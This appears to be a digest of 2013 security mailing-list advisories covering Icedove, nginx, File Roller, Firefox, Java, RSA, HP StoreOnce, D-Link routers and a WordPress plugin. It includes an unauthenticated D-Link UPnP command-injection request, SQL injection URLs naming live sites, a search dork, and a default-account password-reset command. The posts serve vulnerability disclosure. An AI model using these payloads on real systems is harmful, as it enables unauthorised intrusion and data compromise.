[SECURITY] [DSA 2720-1] icedove security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - - Debian Security Advisory DSA-2720-1 secur...@debian.org http://www.debian.org/security/Moritz Muehlenhoff July 06, 2013 http://www.debian.org/security/faq - - Package: icedove Vulnerability : several Problem type : remote Debian-specific: no CVE ID : CVE-2013-1682 CVE-2013-1684 CVE-2013-1685 CVE-2013-1686 CVE-2013-1687 CVE-2013-1690 CVE-2013-1692 CVE-2013-1693 CVE-2013-1694 CVE-2013-1697 Multiple security issues have been found in Icedove, Debian's version of the Mozilla Thunderbird mail and news client. Multiple memory safety errors, use-after-free vulnerabilities, missing permission checks, incorrect memory handling and other implementaton errors may lead to the execution of arbitrary code, privilege escalation, information disclosure or cross-site request forgery. As already announced for Iceweasel: We're changing the approach for security updates for Icedove in stable-security: Instead of backporting security fixes, we now provide releases based on the Extended Support Release branch. As such, this update introduces packages based on Thunderbird 17 and at some point in the future we will switch to the next ESR branch once ESR 17 has reached it's end of life. Some Icedove extensions currently packaged in the Debian archive are not compatible with the new browser engine. Up-to-date and compatible versions can be retrieved from http://addons.mozilla.org as a short term solution. An updated and compatible version of enigmail is included with this update. The icedove version in the oldstable distribution (squeeze) is no longer supported with full security updates. However, it should be noted that almost all security issues in Icedove stem from the included browser engine. These security problems only affect Icedove if scripting and HTML mails are enabled. If there are security issues specific to Icedove (e.g. a hypothetical buffer overflow in the IMAP implementation) we'll make an effort to backport such fixes to oldstable. For the stable distribution (wheezy), these problems have been fixed in version 17.0.7-1~deb7u1. For the unstable distribution (sid), these problems have been fixed in version 17.0.7-1. We recommend that you upgrade your icedove packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iEYEARECAAYFAlHYOV0ACgkQXm3vHE4uyloU2wCg4l3I0e41UASWhsFC7D9BSuiH cxIAn24DJFsYpSO7f8p3EH8TcCD800CC =fQYl -END PGP SIGNATURE-
OS-Command Injection via UPnP Interface in multiple D-Link devices
Vendor: D-Link Devices: DIR-300 rev B / DIR-600 rev B / DIR-645 / DIR-845 / DIR-865 / DAP1522 Vulnerable Firmware Releases: DIR-300 rev B - 2.14b01 DIR-600 - 2.16b01 DIR-645 - 1.04b01 DIR-845 - 1.01b02 DIR-865 - 1.05b03 Other devices and firmware versions may be also vulnerable. Vulnerability Overview: * Unauthenticated OS Command Injection The vulnerability is caused by missing input validation in different XML parameters. This vulnerability could be exploited to inject and execute arbitrary shell commands. WARNING: You do not need to be authenticated to the device to insert and execute malicious commands. Hint: On different devices wget is preinstalled and you are able to upload and execute your malicious binary. = Parameter: NewInternalClient, NewInternalClient, NewInternalPort Example Request: POST /soap.cgi?service=WANIPConn1 HTTP/1.1 SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping Host: 10.8.28.133:49152 Content-Type: text/xml Content-Length: 649 ?xml version=1.0? SOAP-ENV:Envelope xmlns:SOAP-ENV=http://schemas.xmlsoap.org/soap/envelope; SOAP-ENV:encodingStyle=http://schemas.xmlsoap.org/soap/encoding/; SOAP-ENV:Body m:AddPortMapping xmlns:m=urn:schemas-upnp-org:service:WANIPConnection:1 NewPortMappingDescription/NewPortMappingDescription NewLeaseDuration/NewLeaseDuration NewInternalClient`COMMAND`/NewInternalClient NewEnabled1/NewEnabled NewExternalPort634/NewExternalPort NewRemoteHost/NewRemoteHost NewProtocolTCP/NewProtocol NewInternalPort45/NewInternalPort /m:AddPortMapping /SOAP-ENV:Body /SOAP-ENV:Envelope You could use miranda for your own testing: * NewInternalClient Required argument: Argument Name: NewInternalClient Data Type: string Allowed Values: [] Set NewInternalClient value to: `ping 192.168.0.100` * NewExternalPort Required argument: Argument Name: NewExternalPort Data Type: ui2 Allowed Values: [] Set NewExternalPort value to: `ping 192.168.0.100` * NewInternalPort Required argument: Argument Name: NewInternalPort Data Type: ui2 Allowed Values: [] Set NewInternalPort value to: `ping 192.168.0.100` Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/dir-865-v105-shell.png Solution DIR-300 rev B - disable UPnP DIR-600 - update to v2.17b01 DIR-645 - update to v1.04b11 DIR-845 - update to v1.02b03 DIR-865 - disable UPnP Credits The vulnerability was discovered by Michael Messner Mail: devnull#at#s3cur1ty#dot#de Web: http://www.s3cur1ty.de/advisories Twitter: @s3cur1ty_de Time Line: 06.06.2013 - discovered vulnerability 07.06.2013 - reported vulnerability to vendor = some fixes are available but there is no communication with the vendor 06.07.2013 - public disclosure at Sigint 2013 06.07.2013 - public disclosure of advirsory = Advisory end =
[oCERT-2013-001] File Roller path sanitization errors
#2013-001 File Roller path sanitization errors Description: The File Roller archive manager for the GNOME desktop suffers from a path traversal vulnerability caused by insufficient path sanitization. A specially crafted archive file can be used to trigger creation of arbitrary files in any location, writable by the user executing the extraction, outside the current working directory. This behaviour is triggered when the option 'Keep directory structure' is selected from the application 'Extract' dialog. The issue is present on File Roller installations which have been compiled with libarchive support, used to handle tar, cpio, lha, 7zip, ar archiving formats and ISO images. The libarchive support is enabled by default. Affected version: File Roller = 3.6.0, = 3.8.0, = 3.9.1 Fixed version: File Roller = 3.6.4, = 3.8.3, = 3.9.3 Credit: vulnerability report received from Yorick Koster yorick.koster AT securify.nl CVE: CVE-2013-4668 Timeline: 2013-05-16: vulnerability report received 2013-05-20: contacted File Roller maintainer 2013-05-27: maintainer provides patch for review 2013-05-28: reporter confirms patch effectiveness 2013-06-11: oCERT confirms patch effectiveness 2013-06-17: File Roller 3.9.3 released 2013-07-02: File Roller 3.6.4, 3.8.3 released 2013-07-04: contacted affected vendors 2013-07-04: assigned CVE 2013-07-08: advisory release References: http://fileroller.sourceforge.net http://git.gnome.org/browse/file-roller https://git.gnome.org/browse/file-roller/commit/?id=b147281293a8307808475e102a14857055f81631 Permalink: http://www.ocert.org/advisories/ocert-2013-001.html -- Daniele Bianco Open Source Computer Security Incident Response Team dan...@ocert.org http://www.ocert.org GPG Key 0x9544A497 GPG Key fingerprint = 88A7 43F4 F28F 1B9D 6F2D 4AC5 AE75 822E 9544 A497
[SECURITY] [DSA 2721-1] nginx security update
-BEGIN PGP SIGNED MESSAGE- Hash: SHA512 - - Debian Security Advisory DSA-2721-1 secur...@debian.org http://www.debian.org/security/Nico Golde July 07, 2013 http://www.debian.org/security/faq - - Package: nginx Vulnerability : buffer overflow Problem type : remote Debian-specific: no CVE ID : CVE-2013-2070 Debian Bug : 708164 A buffer overflow has been identified in nginx, a small, powerful, scalable web/proxy server, when processing certain chunked transfer encoding requests if proxy_pass to untrusted upstream HTTP servers is used. An attacker may use this flaw to perform denial of service attacks, disclose worker process memory, or possibly execute arbitrary code. The oldstable distribution (squeeze), is not affected by this problem. For the stable distribution (wheezy), this problem has been fixed in version 1.2.1-2.2+wheezy1. For the unstable distribution (sid), this problem has been fixed in version 1.4.1-1. We recommend that you upgrade your nginx packages. Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/ Mailing list: debian-security-annou...@lists.debian.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.12 (GNU/Linux) iQIcBAEBCgAGBQJR2ZOuAAoJEM1LKvOgoKqqTjsQAMKVFfBMx5Xu6XB6jXXM+2CL +m0TyjQp9oKTlTkZpE18fbQviCVk+A1jZZbHdEZlJnEdy0XvXvJpaN6DiNi10IVi kRQkMBtusXI7Bshh4Z/xWh6on9s//06mQzQzymnMQfcKDcg91Z159xPYi86mlxH5 dnf9/XirRwCokM5PI8duw1YJg2aMUpr5wYi14LVpC93ic5UoL3olwtbWcIAJy6VP auORGQLFTUCljpyEtZXku8mD168RnSubP6FZGRfar3JvywBX4MgK/+KnGXuZKZ6H MNDgVrb8hrkzQJQWvycZjhYUhurqSkR17VgJnwiyHxOxP9Sw6adWoH5aRGwoklhH 0d48CMlunJFvYtFEY8rQqiXBLAyZ09CnrEwgQa3hlugGWkRPVxnKmaghOwXZNXez o8RjCYEOdD2BppUc8RJZYz3UYq+WdVKv499HcgKGscol9aJ8XCYoq/G67697EaPF NUFaL3ApZ7rGiuUsx82FujIRs2rjuvQTe9Wiz2jRh0/BjuKarL/TG3r3SVD5/nDX 6j4ngF8eFDmf2ZfxQM1/Ug2ReO+gglnVZyYy4Kn/fxTTwFMLvznR+2lygAJQs/aM CsRN7KQhDdL1FgELvapLYyfcweeq41NJGwIvD7y3O7JKAlO44IO3XcvdAOHWLY2f 8xcpghy474tAclbQPQUi =4eCV -END PGP SIGNATURE-
VUPEN Security Research - Mozilla Firefox Maintenance Service Privilege Escalation Vulnerabilities
VUPEN Security Research - Mozilla Firefox Maintenance Service Local Privilege Escalation Vulnerabilities Website : http://www.vupen.com Twitter : http://twitter.com/vupen I. BACKGROUND - Mozilla Firefox is a free and open source web browser coordinated by Mozilla Corporation and Mozilla Foundation. As of October 2012, Firefox has approximately 20% to 24% of worldwide usage share of web browsers, making it the third most used web browser. (Wikipedia) II. DESCRIPTION - VUPEN Vulnerability Research Team discovered high risk vulnerabilities in Mozilla Firefox. The vulnerabilities are caused by errors in the Mozilla Maintenance Service on Windows when interacting with local software, which could allow local unprivileged users to execute arbitrary code with SYSTEM privileges. It is of course possible to combine these vulnerabilities with a remote Firefox memory corruption to achieve a remote SYSTEM code execution. III. AFFECTED PRODUCTS --- Mozilla Firefox versions prior to 21.0 Mozilla Firefox ESR versions prior to 17.0.6 Mozilla Thunderbird versions prior to 17.0.6 Mozilla Thunderbird ESR versions prior to 17.0.6 IV. Binary Analysis Exploits/PoCs --- In-depth technical analysis of the vulnerability and a private exploit will be available through the VUPEN BAE (Binary Analysis Exploits) portal: http://www.vupen.com/english/services/ba-index.php VUPEN Binary Analysis Exploits Service provides private exploits and in-depth technical analysis of the most significant public vulnerabilities based on disassembly, reverse engineering, protocol analysis, and code audit. The service allows governments and major corporations to evaluate risks, and protect infrastructures and assets against new threats. The service also allows security vendors (IPS, IDS, AntiVirus) to supplement their internal research efforts and quickly develop both vulnerability-based and exploit-based signatures to proactively protect their customers from attacks and emerging threats. V. VUPEN Threat Protection Program --- Governments and major corporations which are members of the VUPEN Threat Protection Program (TPP) have been proactively alerted about the vulnerability when it was discovered by VUPEN in advance of its public disclosure, and have received a detailed attack detection guidance to protect national and critical infrastructures against potential 0-day attacks exploiting this vulnerability: http://www.vupen.com/english/services/tpp-index.php VI. SOLUTION Upgrade to Mozilla Firefox 21.0 or ESR 17.0.6. Upgrade to Mozilla Thunderbird or Thunderbird ESR 17.0.6 VII. CREDIT -- This vulnerability was discovered by Richard L. of VUPEN Security VIII. ABOUT VUPEN Security --- VUPEN is the leading provider of defensive and offensive cybersecurity intelligence and advanced vulnerability research. VUPEN solutions enable corporations and governments to manage risks, and protect critical networks and infrastructures against known and unknown vulnerabilities. VUPEN solutions include: * VUPEN Binary Analysis Exploits Service (BAE) : http://www.vupen.com/english/services/ba-index.php * VUPEN Threat Protection Program (TPP) : http://www.vupen.com/english/services/tpp-index.php IX. REFERENCES -- http://www.mozilla.org/security/announce/2013/mfsa2013-44.html http://www.vupen.com/english/research.php X. DISCLOSURE TIMELINE - -**-** - Vulnerability Discovered by VUPEN 2013-05-14 - Vulnerability Fixed by Mozilla 2013-07-08 - Public disclosure
VUPEN Security Research - Oracle Java Preloader Click-2-Play Warning Bypass Vulnerability
VUPEN Security Research - Oracle Java Applet Preloader Click-2-Play Warning Bypass Vulnerability Website : http://www.vupen.com Twitter : http://twitter.com/vupen I. BACKGROUND - Java is the foundation for virtually every type of networked application and is the global standard for developing and delivering mobile applications, games, Web-based content, and enterprise software. (Oracle) II. DESCRIPTION - VUPEN Vulnerability Research Team discovered a critical vulnerability in Oracle Java. The vulnerability is caused by a design error in the Java click-2-play security warning when the preloader is used, which can be exploited by remote attackers to load a malicious applet (e.g. taking advantage of a Java memory corruption vulnerability) without any user interaction III. AFFECTED PRODUCTS --- Oracle Java version 7u21 and prior IV. Binary Analysis Exploits/PoCs --- In-depth technical analysis of the vulnerability and a private exploit will be available through the VUPEN BAE (Binary Analysis Exploits) portal: http://www.vupen.com/english/services/ba-index.php VUPEN Binary Analysis Exploits Service provides private exploits and in-depth technical analysis of the most significant public vulnerabilities based on disassembly, reverse engineering, protocol analysis, and code audit. The service allows governments and major corporations to evaluate risks, and protect infrastructures and assets against new threats. The service also allows security vendors (IPS, IDS, AntiVirus) to supplement their internal research efforts and quickly develop both vulnerability-based and exploit-based signatures to proactively protect their customers from attacks and emerging threats. V. VUPEN Threat Protection Program --- Governments and major corporations which are members of the VUPEN Threat Protection Program (TPP) have been proactively alerted about the vulnerability when it was discovered by VUPEN in advance of its public disclosure, and have received a detailed attack detection guidance to protect national and critical infrastructures against potential 0-day attacks exploiting this vulnerability: http://www.vupen.com/english/services/tpp-index.php VI. SOLUTION Upgrade to Java 7u25 or later. VII. CREDIT -- This vulnerability was discovered by Florent H. of VUPEN Security VIII. ABOUT VUPEN Security --- VUPEN is the leading provider of defensive and offensive cybersecurity intelligence and advanced vulnerability research. VUPEN solutions enable corporations and governments to manage risks, and protect critical networks and infrastructures against known and unknown vulnerabilities. VUPEN solutions include: * VUPEN Binary Analysis Exploits Service (BAE) : http://www.vupen.com/english/services/ba-index.php * VUPEN Threat Protection Program (TPP) : http://www.vupen.com/english/services/tpp-index.php IX. REFERENCES -- http://www.oracle.com/technetwork/topics/security/javacpujun2013-1899847.html http://www.vupen.com/english/research.php X. DISCLOSURE TIMELINE - -**-** - Vulnerability Discovered by VUPEN 2013-06-18 - Vulnerability Fixed in Java 7u25 2013-07-08 - Public disclosure
Avira Analysis Web Service - SQL Injection Vulnerability
Title: == Avira Analysis Web Service - SQL Injection Vulnerability Date: = 2013-07-08 References: === http://www.vulnerability-lab.com/get_content.php?id=997 VL-ID: = 997 Common Vulnerability Scoring System: 8.5 Abstract: = The Vulnerability Laboratory Core Research Team discovered a critical SQL Injection vulnerability in the Avira Analysis online service application. Report-Timeline: 2013-05-25:Vendor Notification 2013-05-26:Vendor Response/Feedback 2013-06-31:Vendor Fix/Patch 2013-07-08:Public Disclosure Status: Published Affected Products: == Avira Product: Analysis - Web Application Online Service 2013 Q2 Exploitation-Technique: === Remote Severity: = Critical Details: A remote SQL Injection web vulnerability is detected in #1616; the official Avira Analysis online service application. The vulnerability allows remote attackers to inject own sql commands to compromise the affected application dbms. The SQL Injection vulnerability is located in the `overview` file when processing to request manipulated `uniqueid` parameter. By manipulation of the `uniqueid` parameter the attackers can inject own sql commands to compromise the webserver application dbms. When processing to bypass the filter validation by trying to use a single qoute or a double qoute to check if the parameter is vulnerable or not, attackers will be redirected to another page, but when the attacker is processing to request with a back-slash the context will be executed and new mysql errors will become visible for exploitation. The vulnerability can be exploited by remote attackers without privileged application user account and without required user interaction. Successful exploitation of the sql injection vulnerability results in web application and online service dbms compromise. Vulnerable Module(s): [+] en Vulnerable File(s): [+] overview Vulnerable Module(s): [+] uniqueid Proof of Concept: = The remote sql injection web vulnerability can be exploited by remote attackers without privileged application user account and without required user interaction. For demonstration or reproduce ... Vulnerable Service Domain: analysis.avira.com Vulnerable Module: en Vulnerable File:overview Vulnerable Parameter: uniqueid Note: When trying to use a single qoute or a double qoute to check if the parameter is vulnerable or not, you will be redirected to another page, but when processing to load with a back-slash new mysql errors will become visible for exploitation. POC: https://analysis.avira.com/en/overview?start=0uniqueid=1YcGIXI0qbPbpTHg7YvFEr8MG7JmkbSg\[SQL INJECTION VULNERABILITY!] PoC Video: http://www.youtube.com/watch?v=Odko5PTKA-Q Reference(s): https://analysis.avira.com/ Solution: = The vulnerability can be patched by a restriction and secure parse of the uniqueid parameter request. Risk: = The security risk of the remote sql injection web vulnerability is estimated as critical. Credits: Vulnerability Laboratory [Research Team] - Ebrahim Hegazy [Zigoo] (ebra...@evolution-sec.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file
Authentication bypass in D-Link routers
Vendor: D-Link Affected Products: -DIR-505L SharePort Mobile Companion (HW: A1 / FW: 1.01) -DIR-826L Wireless N600 Cloud Router (HW: A1 / FW: 1.02) Vendor Notification: April 8, 2013 Public Disclosure: July 8, 2013 Vulnerability Type: Authentication Bypass CVE Reference: CVE-2013-4772 Solution Status: Not Fixed Credit: Jason Doyle / tw: jasond0yle Advisory Details: It is possible to bypass authentication to gain administrator level access to the web management console by navigating directly to any web page while a legitimate session is still active. This is not possible once a legitimate session has expired. During this window of opportunity, at attacker has unfettered access to view and change all configurable settings on the device, including the addition / modification of user accounts for persistent access.
ESA-2013-052: RSA(r) Authentication Manager Sensitive Information Disclosure Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ESA-2013-052: RSA® Authentication Manager Sensitive Information Disclosure Vulnerability EMC Identifier: ESA-2013-052 CVE Identifier: CVE-2013-3273 Severity Rating: CVSS v2 Base Score: 6.6 (AV:L/AC:M/Au:S/C:C/I:C/A:C) Affected Products: RSA Authentication Manager 7.1 all platforms, including Appliance 3.0 RSA Authentication Manager 8.0 Unaffected Products: RSA Authentication Manager 6.1 Summary: Patch 26 (P26) for RSA Authentication Manager 7.1 Service Pack 4 (SP4) and Appliance 3.0 SP4 and Patch 2 (P2) for RSA Authentication Manager 8.0 contain a fix for a potential security vulnerability. Details: If the RSA Authentication Manager Software Development Kit (SDK) is used to develop a custom application that connects with RSA Authentication Manager with the trace logging is set to verbose, the administrative account password used by the custom application appears in the trace log file as clear text. Recommendation: RSA strongly recommends that customers apply Patch 26 (for RSA Authentication Manager 7.1 SP4) or Patch 2 (for RSA Authentication Manager 8.0) at the earliest opportunity. Additionally, RSA recommends that after applying the patch, you create a new password for the administrative account that an SDK-developed. See release notes for further details. Obtaining Downloads: To obtain the latest RSA product downloads, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose download you want to obtain. Scroll to the section for the product download that you want and click on the link. Obtaining Documentation: To obtain RSA documentation, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com and click Products in the top navigation menu. Select the specific product whose documentation you want to obtain. Scroll to the section for the product version that you want and click the set link. Severity Rating: For an explanation of Severity Ratings, refer to the Knowledge Base Article, Security Advisories Severity Rating at https://knowledge.rsasecurity.com/scolcms/knowledge.aspx?solution=a46604. RSA recommends all customers take into account both the base score and any relevant temporal and environmental scores which may impact the potential severity associated with particular security vulnerability. Obtaining More Information: For more information about RSA products, visit the RSA web site at http://www.rsa.com. Getting Support and Service: For customers with current maintenance contracts, contact your local RSA Customer Support center with any additional questions regarding this RSA SecurCare Note. For contact telephone numbers or e-mail addresses, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com, click Help Contact, and then click the Contact Us - Phone tab or the Contact Us - Email tab. General Customer Support Information: http://www.rsa.com/node.aspx?id=1264 RSA SecurCare Online: https://knowledge.rsasecurity.com EOPS Policy: RSA has a defined End of Primary Support policy associated with all major versions. Please refer to the link below for additional details. http://www.rsa.com/node.aspx?id=2575 SecurCare Online Security Advisories RSA, The Security Division of EMC, distributes SCOL Security Advisories in order to bring to the attention of users of the affected RSA products important security information. RSA recommends that all users determine the applicability of this information to their individual situations and take appropriate action. The information set forth herein is provided as is without warranty of any kind. RSA disclaim all warranties, either express or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event shall RSA or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if RSA or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. About RSA SecurCare Notes Security Advisories Subscription RSA SecurCare Notes Security Advisories are targeted e-mail messages that RSA sends you based on the RSA product family you currently use. If youd like to stop receiving RSA SecurCare Notes Security Advisories, or if youd like to change which RSA product family Notes Security Advisories you currently receive, log on to RSA SecurCare Online at https://knowledge.rsasecurity.com/scolcms/help.aspx?_v=view3. Following the instructions on the page, remove the check mark next to the RSA product family whose Notes Security Advisories you no longer want to receive. Click the Submit button to save your
Authentication bypass in D-Link devices (session cookies not validated)
Vendor: D-Link Affected Products: -DIR-505L SharePort Mobile Companion (HW: A1 / FW: 1.01) -DIR-826L Wireless N600 Cloud Router (HW: A1 / FW: 1.02) Vendor Notification: April 8, 2013 Public Disclosure: July 8, 2013 Vulnerability Type: Authentication Bypass CVE Reference: CVE-2013-4772 Solution Status: Not Fixed Credit: Jason Doyle / tw: jasond0yle Advisory Details: It is possible to bypass authentication to gain administrator level access to the web management console by navigating directly to any web page while a legitimate session is still active. During this window of opportunity, session cookies are not validated and an attacker with or without a session cookie can gain unfettered access to view and change all configurable settings on the device, including the addition / modification of user accounts for persistent access. This is not possible once a legitimate session has expired.
Re: OS-Command Injection via UPnP Interface in multiple D-Link devices
I can concur these issues exist in several other models as well. In fact, on any UPnP enabled D-Link from 868L and down, merely selecting Display Hidden Elements inside the developer tool bar, will expose the entire administrative GUI. Additional models I found the same bug, though I'm so sure that the latest firmware completely fixes the issues. Wireless AC1200 Dual Band Gigabit Cloud Router DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router DIR-860L Wireless N150 Home Router DIR-601 Wireless N 8-Port Router DIR-632
Re: OS-Command Injection via UPnP Interface in multiple D-Link devices
There is a little mistake in the vulnerable Devices. The DAP1522 ist not vulnerable. Correkt: Devices: DIR-300 rev B / DIR-600 rev B / DIR-645 / DIR-845 / DIR-865 Sorry guys, Mike
[security bulletin] HPSBST02890 rev.2 - HP StoreOnce D2D Backup System, Remote Unauthorized Access and Modification
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03813919 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03813919 Version: 2 HPSBST02890 rev.2 - HP StoreOnce D2D Backup System, Remote Unauthorized Access and Modification NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2013-06-26 Last Updated: 2013-07-08 Potential Security Impact: Remote unauthorized access, unauthorized modification Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP StoreOnce D2D Backup System. The vulnerability could be exploited remotely resulting in unauthorized access and modification. Please note that this issue does not affect HP StoreOnce Backup systems that are running software version 3.0.0 or newer. Devices running software version 3.0.0 or newer do not have a HPSupport user account with a pre-set password configured. A user who is logged in via the HPSupport user account does not have access to the data that has been backed up to the HP StoreOnce Backup system, and hence is not able to read or download the backed up data. However, it is possible to reset the device to factory defaults, and hence delete all backed up data that is present on the device. References: CVE-2013-2342 (SSRT101216) SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP StoreOnce D2D Backup platforms running software version 2.2.17 or older and 1.2.17 or older. HP StoreOnce D2D4324 Backup System (EH985A) HP StoreOnce D2D4312 Backup System (EH983B) HP StoreOnce D2D4312 Backup System (EH983A) HP StoreOnce D2D4112 Backup System (EH993C) HP StoreOnce D2D4112 Backup System (EH993B) HP StoreOnce D2D4106i Backup System (EH996B) HP StoreOnce D2D4106i Backup System (EH996A) HP StoreOnce D2D4106fc Backup System (EH998B) HP StoreOnce D2D4106fc Backup System (EH998A) HP StoreOnce D2D2504i Backup System (EJ002C) HP StoreOnce D2D2504i Backup System (EJ002B) HP StoreOnce D2D2502i Backup System (EJ001C) HP StoreOnce D2D2502i Backup System (EJ001B) HP D2D4112 Backup System (EH993A) HP D2D4009fc Backup System (EH942A) HP D2D4009i Backup System (EH939A) HP D2D4004fc Backup System (EH941A) HP D2D4004i Backup System (EH938A) HP D2D2504i Backup System (EJ002A) HP D2D2503i Backup System (EH945A) HP D2D2502i Backup System (EJ001A) BACKGROUND CVSS 2.0 Base Metrics === Reference Base Vector Base Score CVE-2013-2342(AV:A/AC:L/Au:S/C:C/I:C/A:C) 7.7 === Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 The Hewlett-Packard Company thanks Joshua Small for reporting this issue to security-al...@hp.com RESOLUTION HP has made the following software updates available to resolve the vulnerability. HP StoreOnce D2D Backup platforms running software version 2.2.18 or subsequent. HP StoreOnce D2D Backup platforms running software version 1.2.18 or subsequent. Customers will need to upgrade their affected HP StoreOnce Backup systems with the software update. HISTORY Version:1 (rev.1) - 26 June 2013 Initial release Version:2 (rev.2) - 8 July 2013 Software updates released and reporter acknowledgement provided Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-al...@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-al...@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2013 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided
Re: [security bulletin] HPSBST02890 rev.2 - HP StoreOnce D2D Backup System, Remote Unauthorized Access and Modification
VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP StoreOnce D2D Backup System. The vulnerability could be exploited remotely resulting in unauthorized access and modification. A user who is logged in via the HPSupport user account does not have access to the data that has been backed up to the HP StoreOnce Backup system, and hence is not able to read or download the backed up data. However, it is possible to reset the device to factory defaults, and hence delete all backed up data that is present on the device. But you can change the password of the administrator so you can acces the web gui ssh -l HPSupport ip set password Administrator LetMeIn
Re: WordPress feed plugin Sql Injection
On Tue, Jul 02, 2013 at 12:01:15PM +, iedb.t...@gmail.com wrote: The WordPress feed plugin suffers from a Sql Injection vulnerability. # # Iranian Exploit DataBase # http://exploit.iedb.ir # # Exploit Title : WordPress feed plugin Sql Injection # Author : Iranian Exploit DataBase # Discovered By : IeDb # Email : iedb.t...@gmail.com # Home : http://exploit.iedb.ir # Software Link : http://wordpress.org/ # Security Risk : High # Tested on : Linux # Dork : inurl:wp-content/plugins/feed/ # # Exploit : # http://www.Site.com/wp-content/plugins/feed/news_dt.php?nid=[Sql] # Dem0 : # http://easy2remind.com/newsworld/wp-content/plugins/feed/news_dt.php?nid=257[Sql] # # # Exploit Archive = http://exploit.iedb.ir/exploits-176.html # Could you give us proper software link, thanks. There is no such plugin in WordPress plugin repository[1]. Is this non-free plugin? Searching for inurl:/wp-content/plugins/feed/news_dt.php only finds easy2remind.com website. 1: http://plugins.svn.wordpress.org/feed/ --- Henri Salo signature.asc Description: Digital signature
